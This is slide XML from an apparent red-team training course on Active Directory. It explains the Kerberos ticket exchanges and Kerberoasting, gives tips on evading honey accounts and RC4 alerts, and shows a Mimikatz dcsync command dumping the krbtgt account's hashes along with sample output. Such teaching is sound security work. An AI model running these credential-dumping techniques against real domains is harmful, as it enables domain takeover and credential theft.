              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AS-REP: If pre-authentication succeeds (timestamp can be decrypted), the KDC sends two items to the client:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Ticket Granting Ticket (TGT), which includes the Client/TGS session key and is encrypted using the KDC long-term key (in the case of rc4_hmac_md5, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NT password hash). This KDC long-term key is also used to sign the PAC (which is also part of the TGT and includes information on who the user is and what groups he is a member of);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="365760" lvl="1" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Client/TGS session key, encrypted using the client long-term key (in the case of rc4_hmac_md5, the user password hash).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's interesting to note that when pre-authentication is not enabled, the KDC will provide an AS-REP response without validating the encrypted timestamp. While this is not a "critical" issue that would compromise the security of the Kerberos protocol (both response messages would still be encrypted with a key unavailable to the adversary), it would allow adversaries to launch brute-force attacks against the part of the response that is encrypted using the client long-term key (in case of rc4_hmac_md5, the user password hash). We will discuss this in a later module.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Reference:</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lang="en-US" sz="1200" i="0" noProof="0" dirty="0"/>
              <a:t>Illustration inspired by "Abusing Microsoft Kerberos - Sorry you guys don't get it," Benjamin Delpy (Blackhat USA 2014)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3613889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The TGT is the first ticket received by the client. What does it look like? The TGT includes the following information:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Name: This is the user's name the ticket is associated with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Start time and end time: This marks the validity period of the ticket. By default, in Windows AD environments, this would be 10 hours.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization data: Authorization data details the user's privileges and access rights. In Windows, the authorization data takes the form of a Privilege Attribute Certificate (PAC) object.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the Client/TGS session key that can be used for future communications between the client and the TGS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, to prevent the entire TGT from being tampered with, it is encrypted using the KDC long-term key (which is the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> NT hash when rc4_hmac_md5 is used).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The TGT details cannot be read by the client, but that's fine as it only needs to send it back to the KDC for future validation (e.g., when a Service Ticket is requested). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the TGS-REQ, the user wants to authenticate to a certain service and thus sends the following to the KDC (in this case, the TGS component of the KDC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An authenticator message (encrypted using the Client/TGS session key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The encrypted TGT and a ticket request (referencing a certain service principal name: SPN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Reference:</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lang="en-US" sz="1200" i="0" noProof="0" dirty="0"/>
              <a:t>Illustration inspired by "Abusing Microsoft Kerberos - Sorry you guys don't get it," Benjamin Delpy (Blackhat USA 2014)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1599384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If the KDC receives a TGS-REQ with a valid TGT, it will send back a response: TGS-REP. The KDC will validate whether the service to which the client requests access exists and subsequently create a service ticket (ST) that is sent back. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It does so by taking the PAC from the TGT, shoving it into an ST, and then signing that ST with the target LT key (password of the service) and the KDC LT (password of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) and sending that ST to the user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What happens if Allan requests an ST for a service he isn't allowed to access? Yep, the DC doesn't care. The target needs to handle authentication based on the PAC in the ST.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's important to note that the KDC does not do any validation of privileges (the target service can do that by itself, by reviewing the PAC that is included in the service ticket; see below). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The service ticket has two parts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A client portion, which is encrypted using the Client/TGS session key (so this can be decrypted by the client).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A server portion, which is encrypted using the target long-term key (in the case of rc4_hmac_md5, the password hash of the target service). This server portion also includes the PAC of the user. It is this service ticket that the user will subsequently submit to the service he or she is trying to access. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Reference:</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lang="en-US" sz="1200" i="0" noProof="0" dirty="0"/>
              <a:t>Illustration inspired by "Abusing Microsoft Kerberos - Sorry you guys don't get it," Benjamin Delpy (Blackhat USA 2014)!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="246721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8B35-145E-7653-1BF8-421AAF2E09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ECAF4-9C5A-1464-3016-5D58882D7C14}"/>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DFB0FCB4-0F0F-B9EC-C97E-5CCEF4990166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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E77D847F-A39F-795F-816D-F78071A2FE5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3118318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Discovered by Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Medin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> from Red Siege and first presented at SANS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HackFest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Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> leverages a flaw in Service Principal Names to obtain credentials from Active Directory service accounts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Service Principal Names (SPNs) are used to identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account. Any domain user can request a service ticket from the domain controller, as authorization needs to be handled by the target, not the domain controller. Since the server portion is encrypted with the target's long-term key, this ticket is susceptible to brute-force attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>References: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRP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https://www.scythe.io/library/kerberoasting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https://attack.mitre.org/techniques/T1558/003/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="17145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https://github.com/SecureAuthCorp/impacket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245336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When using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> tooling, the tool will typically attempt to request service tickets for all accounts. As we discussed, service accounts are often deployed with at least one honey service account that has been deployed to trap adversaries. From an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>OpSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> perspective, it is not wise to let your tools run rampant. Remember your enumeration skills and be picky about which accounts you are going to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. Prime targets are service accounts that have not had their password reset for a long time but are still actively being used in the environment (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>lastlogon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> property, logon count property). This will increase your chances of successfully performing the roast without triggering any alarms. As an additional reminder, by default, tooling will request tickets in the RC4 format. This makes the cracking significantly faster than the aes256 variant, but it comes at a price, especially in modern environments. RC4 is typically not being used in modern operating systems unless it is necessary; as a result, requesting multiple service tickets in the RC4 format can trigger anomaly alerts.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147310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MS-DRSR, better known as the Microsoft Directory Replication Service Remote Protocol, is the protocol that is being leveraged between domain controllers to replicate changes. This is a very important protocol that all domain controllers use to remain in sync with each other. In order to perform this operation, we need to have the "Replicating Directory Changes All" right. These rights are typically only granted to domain administrators and domain controllers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54317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err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> allows you to perform the MS-DRSR RPC call and retrieve the user hashes stored on the domain controller using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lsadump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> functionality. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>You can either specify the /all flag to dump the entire AD or a specific user with the /user flag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>C:\&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mimikatz.exe</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump</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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain:asgard.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /user: ASGARD\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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SAM Username : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRP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Object Security ID : S-1-5-21-2716382980-2373322634-4127565559-502</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Credentials:</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Hash NTLM: d6a9e8d303d88aa310f95f14feac90b1</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- 0: d6a9e8d303d88aa310f95f14feac90b1</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - 0: ac092f5be282a6f104f0c5c0ecac51bd</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Credentials</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aes256_hmac (4096) : dd002d202266f9c5aa9beb5eaba6518dc57212b2a3e6ff7c2fbf3ded21259da1</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aes128_hmac (4096) : ab5bc15c43d6055f90d6ce52f3de1400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
